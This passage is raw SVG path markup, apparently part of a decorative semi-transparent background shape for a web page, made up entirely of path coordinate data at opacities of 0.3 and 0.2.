d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.